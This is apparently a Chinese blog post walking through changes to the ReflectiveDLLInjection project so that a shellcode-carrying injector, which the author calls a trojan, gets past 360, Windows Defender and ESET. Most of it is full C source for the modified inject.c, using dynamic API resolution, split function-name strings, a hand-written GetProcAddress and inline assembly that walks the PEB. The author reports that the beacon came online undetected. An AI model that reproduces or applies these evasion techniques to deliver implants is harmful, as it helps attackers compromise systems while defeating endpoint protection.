反射注入dll-修改实现免杀过360
getAdvapi32()函数也是LoadLibrary(“advapi32.dll”)的变形,和getKernel32作用一样,只不过是函数所在的dll不同,写成汇编形式避免检测,但是使用getAdvapi32()生成会无法注入(具体原因不清除,之后再研究吧),那么我这里注释掉,仅仅用了getKernel32函数。获得的pCFA就是原始的CreateFileA函数了,只不过被我们定义成了自己的,
·
这里我们直接使用项目
https://github.com/stephenfewer/ReflectiveDLLInjection
然后我在原项目上进行修改
这里我将原作者写的弹框修改写成我自己的shellcode
成功上线,后续还需要更改一些,因为这里没进行黑框处理,没进行beacon的sgn化混淆,那么我们之后修改
这里注意下,因为visual studio对长度长的shellcode修改比较卡顿,那么我们直接换其他编辑器修改即可,比如notepad++之类的打开进行修改shellcode
黑框处理的话后面会说
我们来看看360环境下
可以看到不免杀,虽然反射dll,但是项目时间过长
那么免杀思路:
dll的话直接查杀不会报毒,那么我们主要是inject.exe
注意我这里改的是x86的木马
主要修改的文件inject.c文件
//===============================================================================================//
// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include "LoadLibraryR.h"
#pragma comment(lib,"Advapi32.lib")
#define BREAK_WITH_ERROR( e ) { printf( "[-] %s. Error=%d", e, GetLastError() ); break; }
// Simple app to inject a reflective DLL into a process vis its process ID.
int main( int argc, char * argv[] )
{
HANDLE hFile = NULL;
HANDLE hModule = NULL;
HANDLE hProcess = NULL;
HANDLE hToken = NULL;
LPVOID lpBuffer = NULL;
DWORD dwLength = 0;
DWORD dwBytesRead = 0;
DWORD dwProcessId = 0;
TOKEN_PRIVILEGES priv = {0};
#ifdef WIN_X64
char * cpDllFile = "reflective_dll.x64.dll";
#else
#ifdef WIN_X86
char * cpDllFile = "reflective_dll.dll";
#else WIN_ARM
char * cpDllFile = "reflective_dll.arm.dll";
#endif
#endif
do
{
// Usage: inject.exe [pid] [dll_file]
if( argc == 1 )
dwProcessId = GetCurrentProcessId();
else
dwProcessId = atoi( argv[1] );
if( argc >= 3 )
cpDllFile = argv[2];
hFile = CreateFileA( cpDllFile, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL ); //1
if( hFile == INVALID_HANDLE_VALUE )
BREAK_WITH_ERROR( "Failed to open the DLL file" );
dwLength = GetFileSize( hFile, NULL );
if( dwLength == INVALID_FILE_SIZE || dwLength == 0 )
BREAK_WITH_ERROR( "Failed to get the DLL file size" );
lpBuffer = HeapAlloc( GetProcessHeap(), 0, dwLength ); //2
if( !lpBuffer )
BREAK_WITH_ERROR( "Failed to get the DLL file size" );
if( ReadFile( hFile, lpBuffer, dwLength, &dwBytesRead, NULL ) == FALSE )
BREAK_WITH_ERROR( "Failed to alloc a buffer!" );
if( OpenProcessToken( GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken ) ) //3
{
priv.PrivilegeCount = 1;
priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if( LookupPrivilegeValue( NULL, SE_DEBUG_NAME, &priv.Privileges[0].Luid ) )
AdjustTokenPrivileges( hToken, FALSE, &priv, 0, NULL, NULL ); //4
CloseHandle( hToken );
}
hProcess = OpenProcess( PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, FALSE, dwProcessId );
if( !hProcess )
BREAK_WITH_ERROR( "Failed to open the target process" );
hModule = LoadRemoteLibraryR( hProcess, lpBuffer, dwLength, NULL );
if( !hModule )
BREAK_WITH_ERROR( "Failed to inject the DLL" );
printf( "[+] Injected the '%s' DLL into process %d.", cpDllFile, dwProcessId );
WaitForSingleObject( hModule, -1 );
} while( 0 );
if( lpBuffer )
HeapFree( GetProcessHeap(), 0, lpBuffer );
if( hProcess )
CloseHandle( hProcess );
return 0;
}
通过以上代码,我们可以看到有几处敏感函数会被杀,如上标记的四处,那么我们需要将这四个敏感函数通过动态调用的方式获得,同时动态调用时候函数名字进行打散处理
也就是通过GetProcAddress函数获得dll中的函数,如下
//===============================================================================================//
// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include "LoadLibraryR.h"
#pragma comment(lib,"Advapi32.lib")
#define BREAK_WITH_ERROR( e ) { printf( "[-] %s. Error=%d", e, GetLastError() ); break; }
typedef HANDLE(WINAPI* CreateFileAFunc)(LPCSTR, DWORD, DWORD, LPSECURITY_ATTRIBUTES, DWORD, DWORD, HANDLE);
//声明定义CreateFileA
typedef HANDLE(WINAPI* FN_CFA)(
_In_ LPCSTR lpFileName,
_In_ DWORD dwDesiredAccess,
_In_ DWORD dwShareMode,
_In_opt_ LPSECURITY_ATTRIBUTES lpSecurityAttributes,
_In_ DWORD dwCreationDisposition,
_In_ DWORD dwFlagsAndAttributes,
_In_opt_ HANDLE hTemplateFile
);
typedef HANDLE(WINAPI* FN_HAc)(
_In_ HANDLE hHeap,
_In_ DWORD dwFlags,
_In_ SIZE_T dwBytes
);
typedef HANDLE(WINAPI* FN_OPTn)(
_In_ HANDLE ProcessHandle,
_In_ DWORD DesiredAccess,
_Outptr_ PHANDLE TokenHandle
);
typedef HANDLE(WINAPI* FN_ATPs)(
_In_ HANDLE TokenHandle,
_In_ BOOL DisableAllPrivileges,
_In_opt_ PTOKEN_PRIVILEGES NewState,
_In_ DWORD BufferLength,
_Out_writes_bytes_to_opt_(BufferLength, *ReturnLength) PTOKEN_PRIVILEGES PreviousState,
_Out_opt_ PDWORD ReturnLength
);
//声明定义GetProcAddress
typedef FARPROC(WINAPI* FN_GetProcAddress)(
_In_ HMODULE hModule,
_In_ LPCSTR lpProcName
);
// Simple app to inject a reflective DLL into a process vis its process ID.
int main( int argc, char * argv[] )
{
HANDLE hFile = NULL;
HANDLE hModule = NULL;
HANDLE hProcess = NULL;
HANDLE hToken = NULL;
LPVOID lpBuffer = NULL;
DWORD dwLength = 0;
DWORD dwBytesRead = 0;
DWORD dwProcessId = 0;
TOKEN_PRIVILEGES priv = {0};
#ifdef WIN_X64
char * cpDllFile = "C:\\Users\\Public\\reflective_dll.x64.dll";
#else
#ifdef WIN_X86
char * cpDllFile = "E:\\ReflectiveDLLInjection-master\\Release\\reflective_dll.dll";
#else WIN_ARM
char * cpDllFile = "reflective_dll.arm.dll";
#endif
#endif
do
{
// Usage: inject.exe [pid] [dll_file]
if( argc == 1 )
dwProcessId = GetCurrentProcessId();
else
dwProcessId = atoi( argv[1] );
if( argc >= 3 )
cpDllFile = argv[2];
//带引号的字符串打散处理
char xyCFA[] = { 'C','r','e','a','t','e','F','i','l','e','A',0 };
//动态替换
FN_CFA pCFA = (FN_CFA)GetProcAddress(LoadLibrary("Kernel32.dll"), xyCFA);
/* hFile = CreateFileA( cpDllFile, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL ); */ //1
hFile = pCFA(cpDllFile, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if( hFile == INVALID_HANDLE_VALUE )
BREAK_WITH_ERROR( "Failed to open the DLL file" );
dwLength = GetFileSize( hFile, NULL );
if( dwLength == INVALID_FILE_SIZE || dwLength == 0 )
BREAK_WITH_ERROR( "Failed to get the DLL file size" );
//带引号的字符串打散处理
char xyHAc[] = { 'H','e','a','p','A','l','l','o','c',0 };
/*lpBuffer = HeapAlloc( GetProcessHeap(), 0, dwLength ); */ //2
FN_HAc pHAc = (FN_HAc)GetProcAddress(LoadLibrary("Kernel32.dll"), xyHAc);
lpBuffer = pHAc(GetProcessHeap(), 0, dwLength);
if( !lpBuffer )
BREAK_WITH_ERROR( "Failed to get the DLL file size" );
if( ReadFile( hFile, lpBuffer, dwLength, &dwBytesRead, NULL ) == FALSE )
BREAK_WITH_ERROR( "Failed to alloc a buffer!" );
//带引号的字符串打散处理
char xyOPTn[] = { 'O','p','e','n','P','r','o','c','e','s','s','T','o','k','e','n',0 };
FN_OPTn pOPTn = (FN_OPTn)GetProcAddress(LoadLibrary("advapi32.dll"), xyOPTn);
//带引号的字符串打散处理
char xyATPs[] = { 'A','d','j','u','s','t','T','o','k','e','n','P','r','i','v','i','l','e','g','e','s',0 };
FN_ATPs pATPs = (FN_ATPs)GetProcAddress(LoadLibrary("advapi32.dll"), xyATPs);
/* if(OpenProcessToken( GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken ) ) */ //3
if (pOPTn(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
{
priv.PrivilegeCount = 1;
priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if (LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &priv.Privileges[0].Luid))
/*AdjustTokenPrivileges( hToken, FALSE, &priv, 0, NULL, NULL ); */ //4
pATPs(hToken, FALSE, &priv, 0, NULL, NULL);
CloseHandle( hToken );
}
hProcess = OpenProcess( PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, FALSE, dwProcessId ); //5
if( !hProcess )
BREAK_WITH_ERROR( "Failed to open the target process" );
hModule = LoadRemoteLibraryR( hProcess, lpBuffer, dwLength, NULL ); //5
if( !hModule )
BREAK_WITH_ERROR( "Failed to inject the DLL" );
printf( "[+] Injected the '%s' DLL into process %d.", cpDllFile, dwProcessId );
WaitForSingleObject( hModule, -1 );
} while( 0 );
if( lpBuffer )
HeapFree( GetProcessHeap(), 0, lpBuffer );
if( hProcess )
CloseHandle( hProcess );
return 0;
}
这里以第一个CreateFileA为例
先声明一个我们自己的CreateFileA的类型,我这里类型为FN_CFA
很简单,我们将原来的CreateFileA
复制粘贴到我们的inject.c当前代码中,然后修改定义类型如下
那么我们声明好之后,打散函数名,然后用getProcAddress函数进行调用dll获得函数名
获得的pCFA就是原始的CreateFileA函数了,只不过被我们定义成了自己的,这样就会规避检测了,那么剩下的三处也是同样方法修改,具体参考上面给的代码
那么第一次修改后
可以看到能正常运行我们看看免杀效果,还是不行
那么我们需要自实现
//===============================================================================================//
// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include "LoadLibraryR.h"
#pragma comment(lib,"Advapi32.lib")
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")
#define BREAK_WITH_ERROR( e ) { printf( "[-] %s. Error=%d", e, GetLastError() ); break; }
typedef HANDLE(WINAPI* CreateFileAFunc)(LPCSTR, DWORD, DWORD, LPSECURITY_ATTRIBUTES, DWORD, DWORD, HANDLE);
//声明定义CreateFileA
typedef HANDLE(WINAPI* FN_CFA)(
_In_ LPCSTR lpFileName,
_In_ DWORD dwDesiredAccess,
_In_ DWORD dwShareMode,
_In_opt_ LPSECURITY_ATTRIBUTES lpSecurityAttributes,
_In_ DWORD dwCreationDisposition,
_In_ DWORD dwFlagsAndAttributes,
_In_opt_ HANDLE hTemplateFile
);
typedef HANDLE(WINAPI* FN_HAc)(
_In_ HANDLE hHeap,
_In_ DWORD dwFlags,
_In_ SIZE_T dwBytes
);
typedef HANDLE(WINAPI* FN_OPTn)(
_In_ HANDLE ProcessHandle,
_In_ DWORD DesiredAccess,
_Outptr_ PHANDLE TokenHandle
);
typedef HANDLE(WINAPI* FN_ATPs)(
_In_ HANDLE TokenHandle,
_In_ BOOL DisableAllPrivileges,
_In_opt_ PTOKEN_PRIVILEGES NewState,
_In_ DWORD BufferLength,
_Out_writes_bytes_to_opt_(BufferLength, *ReturnLength) PTOKEN_PRIVILEGES PreviousState,
_Out_opt_ PDWORD ReturnLength
);
//声明定义GetProcAddress
typedef FARPROC(WINAPI* FN_GetProcAddress)(
_In_ HMODULE hModule,
_In_ LPCSTR lpProcName
);
// Simple app to inject a reflective DLL into a process vis its process ID.
int main(int argc, char* argv[])
{
HANDLE hFile = NULL;
HANDLE hModule = NULL;
HANDLE hProcess = NULL;
HANDLE hToken = NULL;
LPVOID lpBuffer = NULL;
DWORD dwLength = 0;
DWORD dwBytesRead = 0;
DWORD dwProcessId = 0;
TOKEN_PRIVILEGES priv = { 0 };
#ifdef WIN_X64
char* cpDllFile = "C:\\Users\\Public\\reflective_dll.x64.dll";
#else
#ifdef WIN_X86
char* cpDllFile = "reflective_dll.dll";
#else WIN_ARM
char* cpDllFile = "reflective_dll.arm.dll";
#endif
#endif
do
{
// Usage: inject.exe [pid] [dll_file]
if (argc == 1)
dwProcessId = GetCurrentProcessId();
else
dwProcessId = atoi(argv[1]);
if (argc >= 3)
cpDllFile = argv[2];
//获取GetProcAddress真实地址
FN_GetProcAddress fn_GetProcAddress = (FN_GetProcAddress)getProcAddress((HMODULE)getKernel32());
//带引号的字符串打散处理
char xyCFA[] = { 'C','r','e','a','t','e','F','i','l','e','A',0 };
//动态替换
//FN_CFA pCFA = (FN_CFA)GetProcAddress((HMODULE)getKernel32(), xyCFA);
FN_CFA pCFA = (FN_CFA)fn_GetProcAddress((HMODULE)getKernel32(), xyCFA);
/* hFile = CreateFileA( cpDllFile, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL ); */ //1
hFile = pCFA(cpDllFile, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (hFile == INVALID_HANDLE_VALUE)
BREAK_WITH_ERROR("Failed to open the DLL file");
dwLength = GetFileSize(hFile, NULL);
if (dwLength == INVALID_FILE_SIZE || dwLength == 0)
BREAK_WITH_ERROR("Failed to get the DLL file size");
//带引号的字符串打散处理
char xyHAc[] = { 'H','e','a','p','A','l','l','o','c',0 };
/*lpBuffer = HeapAlloc( GetProcessHeap(), 0, dwLength ); */ //2
//FN_HAc pHAc = (FN_HAc)GetProcAddress((HMODULE)getKernel32(), xyHAc);
FN_HAc pHAc = (FN_HAc)fn_GetProcAddress((HMODULE)getKernel32(), xyHAc);
lpBuffer = pHAc(GetProcessHeap(), 0, dwLength);
if (!lpBuffer)
BREAK_WITH_ERROR("Failed to get the DLL file size");
if (ReadFile(hFile, lpBuffer, dwLength, &dwBytesRead, NULL) == FALSE)
BREAK_WITH_ERROR("Failed to alloc a buffer!");
//获取GetProcAddress真实地址
//FN_GetProcAddress afn_GetProcAddress = (FN_GetProcAddress)getProcAddress((HMODULE)GetAdvapi32BaseAddress());
//带引号的字符串打散处理
char xyOPTn[] = { 'O','p','e','n','P','r','o','c','e','s','s','T','o','k','e','n',0 };
FN_OPTn pOPTn = (FN_OPTn)GetProcAddress(LoadLibrary("advapi32.dll"), xyOPTn);
//FN_OPTn pOPTn = (FN_OPTn)afn_GetProcAddress(GetAdvapi32BaseAddress(), xyOPTn);
//带引号的字符串打散处理
char xyATPs[] = { 'A','d','j','u','s','t','T','o','k','e','n','P','r','i','v','i','l','e','g','e','s',0 };
FN_OPTn pATPs = (FN_OPTn)GetProcAddress(LoadLibrary("advapi32.dll"), xyATPs);
//FN_ATPs pATPs = (FN_ATPs)afn_GetProcAddress(GetAdvapi32BaseAddress(), xyATPs);
if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) //3
if (pOPTn(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
{
priv.PrivilegeCount = 1;
priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if (LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &priv.Privileges[0].Luid))
/*AdjustTokenPrivileges( hToken, FALSE, &priv, 0, NULL, NULL ); */ //4
pATPs(hToken, FALSE, &priv, 0, NULL, NULL);
CloseHandle(hToken);
}
hProcess = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, FALSE, dwProcessId); //5
if (!hProcess)
BREAK_WITH_ERROR("Failed to open the target process");
hModule = LoadRemoteLibraryR(hProcess, lpBuffer, dwLength, NULL); //5
if (!hModule)
BREAK_WITH_ERROR("Failed to inject the DLL");
printf("[+] Injected the '%s' DLL into process %d.", cpDllFile, dwProcessId);
WaitForSingleObject(hModule, -1);
} while (0);
if (lpBuffer)
HeapFree(GetProcessHeap(), 0, lpBuffer);
if (hProcess)
CloseHandle(hProcess);
return 0;
}
//获取GetProcAddress的地址
getProcAddress(HMODULE hModuleBase)
{
PIMAGE_DOS_HEADER lpDosHeader = (PIMAGE_DOS_HEADER)hModuleBase;
PIMAGE_NT_HEADERS32 lpNtHeader = (PIMAGE_NT_HEADERS)((DWORD)hModuleBase + lpDosHeader->e_lfanew);
if (!lpNtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size) {
return NULL;
}
if (!lpNtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress) {
return NULL;
}
PIMAGE_EXPORT_DIRECTORY lpExports = (PIMAGE_EXPORT_DIRECTORY)((DWORD)hModuleBase + (DWORD)lpNtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
PDWORD lpdwFunName = (PDWORD)((DWORD)hModuleBase + (DWORD)lpExports->AddressOfNames);
PWORD lpword = (PWORD)((DWORD)hModuleBase + (DWORD)lpExports->AddressOfNameOrdinals);
PDWORD lpdwFunAddr = (PDWORD)((DWORD)hModuleBase + (DWORD)lpExports->AddressOfFunctions);
DWORD dwLoop = 0;
FARPROC pRet = NULL;
for (; dwLoop <= lpExports->NumberOfNames - 1; dwLoop++) {
char* pFunName = (char*)(lpdwFunName[dwLoop] + (DWORD)hModuleBase);
if (pFunName[0] == 'G' &&
pFunName[1] == 'e' &&
pFunName[2] == 't' &&
pFunName[3] == 'P' &&
pFunName[4] == 'r' &&
pFunName[5] == 'o' &&
pFunName[6] == 'c' &&
pFunName[7] == 'A' &&
pFunName[8] == 'd' &&
pFunName[9] == 'd' &&
pFunName[10] == 'r' &&
pFunName[11] == 'e' &&
pFunName[12] == 's' &&
pFunName[13] == 's')
{
pRet = (FARPROC)(lpdwFunAddr[lpword[dwLoop]] + (DWORD)hModuleBase);
break;
}
}
return pRet;
}
//内嵌汇编获取Kernel32的地址
__declspec(naked) DWORD getKernel32()
{
__asm
{
mov eax, fs: [30h]
mov eax, [eax + 0ch]
mov eax, [eax + 14h]
mov eax, [eax]
mov eax, [eax]
mov eax, [eax + 10h]
ret
}
}
DWORD_PTR GetAdvapi32BaseAddress()
{
DWORD_PTR advapi32Base = 0;
__asm
{
mov eax, fs: [0x30] // 获取 PEB
mov eax, [eax + 0x0C] // 获取 LDR 模块链表头
mov eax, [eax + 0x14] // 获取第一个模块的基址
mov eax, [eax] // 指向 InMemoryOrderModuleList 的 Flink
mov eax, [eax + 0x10] // 获取第二个模块的基址(Advapi32.dll)
mov advapi32Base, eax
}
return advapi32Base;
}
这段代码主要先自实现了GetProcAddress函数,
还是先声明
然后调用
可以看到这里获得真实地址是用到getProcAddress函数,这里我们重新写的获得
同时这里获得方式不是调用LoadLibrary(“Kernel32.dll”)这种方式获得的,也容易被检测,那么就自己写了getKernel32函数,作用就是获得获取Kernel32的地址
那么这样就绕过了很多检测,下面的几处修改也是这样,如上面给出的代码
getAdvapi32()函数也是LoadLibrary(“advapi32.dll”)的变形,和getKernel32作用一样,只不过是函数所在的dll不同,写成汇编形式避免检测,但是使用getAdvapi32()生成会无法注入(具体原因不清除,之后再研究吧),那么我这里注释掉,仅仅用了getKernel32函数
那么我们重新生成,看看杀软效果
成功过掉了360的检测,并正常上线
踩坑点,一定注意,x86的loader加载x86的shellcode,也就是reflective_dll里写的shellcode是x86的,那么inject里的自实现函数也要写成x86下有效的,而且汇编那部分只能用于x86下
试试windows defender
可以看到成功过掉windows defender的检测
当我传了eset之后,过两天就不免杀了,那么我继续修改
发现ReadFile函数也是会被杀软hook到的,还有VirtualProtect最容易被检测的点,那么我修改它们,如下
VirtualProtect修改如下:
ReadFile修改如下:
重新生成,再次运行
可以看到再次免杀360
有“AI”的1024 = 2048,欢迎大家加入2048 AI社区
更多推荐
1
0- 0
已为社区贡献5条内容
所有评论(0)